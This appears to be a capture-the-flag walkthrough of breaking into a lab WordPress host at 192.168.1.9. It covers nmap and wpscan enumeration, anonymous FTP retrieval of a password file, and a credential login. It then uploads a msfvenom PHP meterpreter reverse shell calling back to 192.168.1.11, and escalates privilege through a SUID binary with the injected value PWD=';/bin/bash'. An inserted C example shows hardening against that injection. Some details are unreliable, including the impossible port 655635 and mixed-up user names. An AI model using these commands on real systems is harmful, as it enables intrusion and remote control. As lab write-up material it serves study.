Scan the host with nmap: nmap -A -T4 -p- 192.168.1.9 -vv
As we visit the host IP, it is running a WordPress service.
Let's run wpscan to enumerate usernames:
wpscan --url http://192.168.1.9 -e u
Now we can confirm that we have the user admin.
We can see from the nmap scan that the FTP service is open, allows anonymous login, and holds a file called backupPasswords.
We logged in using ftp 192.168.1.9 with the username anonymous; listing the directory shows the file backupPasswords, which we download with the get command.
Trying to brute force the SSH and FTP services with the username Doe and the password file didn't work.
Using dirb on the host returned results, but not very useful ones; trying it against port 655635 gave good results, with the path /phpcms.
The page is for a user named John, not Don, so let's wpscan it and see what we can find.
Two usernames: maybeadmin and notadmin. I tried the first username against the backupPasswords file and got a login using the password $EPid%J2L9LufO5
I went straight to the Secure Post, and viewing it we can see the other username and password.
Now let's log in using the new username and password. After that we can upload a shell through the plugins: search for File Manager in the plugins and install it, open it and upload a PHP shell generated with msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=443 -f raw > shell.php
Just right-click the shell and view it while Metasploit is running a multi/handler, and we will get a shell.
Now let's do some privilege escalation on the host.
The itseasy file is a SUID binary that we can manipulate with export PWD=';/bin/bash' and then run to get a shell with John's privileges.
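The PWD trick above works because the setuid program hands an environment value to a shell, where the ';' ends one command and starts another. The page does not show itseasy's source, so the following is an added example, not the binary's real code: it assumes a setuid helper that wants to list the directory named by $PWD, and shows the defensive handling (validate the value, never pass it through system(), drop the elevated privilege before exec) that would have closed this hole.

```c
/* Hardened handling of an environment-supplied path in a setuid helper.
 * Assumed scenario (not the real itseasy source): the helper lists the
 * directory named by $PWD. Building a command string from getenv("PWD")
 * and passing it to system() is what lets a value like ';/bin/bash'
 * start a shell as the file owner; none of that happens below. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only an absolute path built from a conservative character set.
 * Returns 1 if usable, 0 otherwise. Shell metacharacters (; | & $ ` ' "
 * and whitespace) never pass, so an injected PWD value is refused. */
int pwd_is_safe(const char *p) {
    if (p == NULL || p[0] != '/' || strlen(p) >= 4096) return 0;
    for (; *p; p++) {
        if (!((*p >= 'a' && *p <= 'z') || (*p >= 'A' && *p <= 'Z') ||
              (*p >= '0' && *p <= '9') || strchr("/._-", *p)))
            return 0;
    }
    return 1;
}

/* List `dir` without a shell: drop the setuid/setgid privilege first, then
 * exec /bin/ls with a fixed argv so the path is a single argument that no
 * shell ever parses. Returns the child's exit status, or -1 on refusal
 * or failure. */
int list_dir_safely(const char *dir) {
    if (!pwd_is_safe(dir)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        execl("/bin/ls", "ls", "-l", "--", dir, (char *)NULL);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *pwd = getenv("PWD");
    int rc = list_dir_safely(pwd);
    if (rc < 0) fprintf(stderr, "refusing PWD value: %s\n", pwd ? pwd : "(unset)");
    return rc < 0 ? 1 : rc;
}
```

When auditing a SUID binary, a quick check for this class of bug is whether it calls system() or popen() at all; a helper that only ever uses exec with a fixed argv cannot be steered by environment strings in this way.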
Going to John's home directory, there is a folder .local, inside it more folders, and finally a text file with some information that looks to be base64 encoded; decoding it gives a password to log in to the SSH service.
Now we need to create a file named test.html in the path var/www/html, but trying to create it as John gave permission denied, so I went back to Doe, created the file and set its permissions, then returned to John's SSH session and ran it again.